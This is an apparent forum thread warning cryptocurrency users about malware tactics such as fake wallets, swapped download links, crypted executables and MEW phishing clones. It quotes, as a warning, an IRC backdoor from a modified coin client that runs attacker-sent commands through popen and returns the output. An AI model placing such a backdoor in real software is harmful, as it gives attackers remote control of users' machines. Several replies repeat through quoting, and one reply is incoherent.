a year ago, my email was hacked. After that, the coins were withdrawn from the exchange . It cost about 3,5k$. 2 FA has not been installed. Gmail mail return failed. Many contacts are missing
It is better to have special e-mail for exchange with 2FA enabled and special smartphone with Google application. You don’t have to use this e-mail and smartphone for any other purposes. 
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 10. (Read 692272 times)
I'm quite impressed by the power and imagination of hackers to find the weakness and explote it everywhere !
finally you never know if you are 100% safe or not.
Just be carefull as much as possible
finally you never know if you are 100% safe or not.
Just be carefull as much as possible
Tell me, is it so MAC OS is not protected from such attempts to harm? It seemed to me that Apple's products are quite protected
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
What security system to do to avoid falling into the trap of cybercriminals and how to understand that it is cybercriminals ? "latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
I had a similar issue last year, when I was sent a free trading bot by an online acquitance who I met in a telegram trading group. I left the file to download while I took a nap only to wake up to the most unfortunate incidence, all my trading accounts were wiped. I still cannot fathom, how it got access to the trading accounts without 2FA, though my phone was beside my laptop. I regret leaving my accounts opened on the browser. My advice is to abstain from downloading free softwares, or any application you don't understand, it's pretty risky. God help us.
There is a new type of malware and account stealing for MEW. Its called MEWkit. It steals money from the victim’s wallet through a front-end program that mimics the MyEtherWallet.
Another one targets airdrops. They basically ask you to fill out a form with all you info and address and then redirect you to another site that is a clone of MEW. You will be requested to sign a message that will in turn steal your keys. This was informed by the official MEW account on twitter.
Another one targets airdrops. They basically ask you to fill out a form with all you info and address and then redirect you to another site that is a clone of MEW. You will be requested to sign a message that will in turn steal your keys. This was informed by the official MEW account on twitter.
yes it is very dangerous, we must be very careful
I am used to bookmarking important sites to avoid being directed to such things
I also usually check the site twice before filling in important data
This is really rampant nowadays. Offline wallet can still make us secure no matter what
I'm an invalid code and looking out the hole. sad and sorry, but do not know this copy.authenticate does not think to a currency 
Ive been alarmed by this post. Sometimes it really helps when you read on a forum like this.. But my concern is, how can i detect those malware infections if i dont have any experience and knowledge about the codes that their using..? Sometimes i just click on links, and i dont know if clicking certain links will cause infections on my device, and i will loose all my data or theres a possibility that i will be hacked. Online thing is really dangerous.
Anyaways this post is very informative, and keep reminding everyone to be extra careful.
Anyaways this post is very informative, and keep reminding everyone to be extra careful.
Thank you for sharing tips and information like this. I found this link in this thread https://bitcointalksearch.org/topic/how-i-met-my-scammer-3839038 which is also quite useful to me as a new member of this forum.
Thanks for being on top of this and keeping us informed, we do appreciate it!
Are the malware attempts still going on? What care should be taken as a beginner?
I use antivirus Avast Premier - I forgot what viruses, rootkits and other mucks. Very satisfied with this product! I recommend to everyone! It is especially important to have an antivirus if you use a software purse.
a year ago, my email was hacked. After that, the coins were withdrawn from the exchange . It cost about 3,5k$. 2 FA has not been installed. Gmail mail return failed. Many contacts are missing
I am deeply saddened to hear that. Same way with my friends they share s the same reason hacker took a lot of their earnings it's also a large cost and they regret what happened but still its great lessoned for them and learned what happened so for you next time be aware and secured your accounts as much as possible we put so much effort and time earning those token.
Everybody please use avast antivirus. It will help remove millions to dangerous applications, and malware on your computer, which can help to avoid digging underground coin.
a year ago, my email was hacked. After that, the coins were withdrawn from the exchange . It cost about 3,5k$. 2 FA has not been installed. Gmail mail return failed. Many contacts are missing
That's why it's good to have more wallets. One for coins that are worthy of you, one for airdrop, ...
There is a new type of malware and account stealing for MEW. Its called MEWkit. It steals money from the victim’s wallet through a front-end program that mimics the MyEtherWallet.
Another one targets airdrops. They basically ask you to fill out a form with all you info and address and then redirect you to another site that is a clone of MEW. You will be requested to sign a message that will in turn steal your keys. This was informed by the official MEW account on twitter.
Another one targets airdrops. They basically ask you to fill out a form with all you info and address and then redirect you to another site that is a clone of MEW. You will be requested to sign a message that will in turn steal your keys. This was informed by the official MEW account on twitter.
This is so true there are kinds of malware infections that can infiltrate our computers, let alone our very own wallets. We just need to be more keen when it comes to securing our beloved coins and making sure that they will not just vanish into thin air, the same with the efforts that we have put into our earnings
These malware attacks keep getting more insidious and scary everyday... one cant be careful enough online
Jump to: